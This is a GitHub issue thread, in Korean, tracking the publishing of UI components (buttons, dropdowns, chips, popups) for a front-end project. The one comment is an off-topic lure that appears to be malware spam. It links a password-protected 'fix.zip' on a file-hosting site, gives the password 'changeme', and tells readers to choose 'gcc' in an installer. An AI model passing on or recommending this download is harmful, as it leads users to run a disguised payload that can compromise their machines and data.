### ISSUE TITLE
[design] 컴포넌트 퍼블리싱

### ISSUE THREAD

**Issue by Sohyunnnn** [LetsCareer-A/LetsCareerA-FE#5]
## ✨ 컴포넌트 퍼블리싱

- [x] 버튼 ui 추가 및 상태 별 ui 추가
- [x] 드롭다운 ui 추가 및 상태 별 ui 추가
- [ ] chips ui 추가 및 상태 별 ui 추가
- [x] 팝업 ui 추가

<br>

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
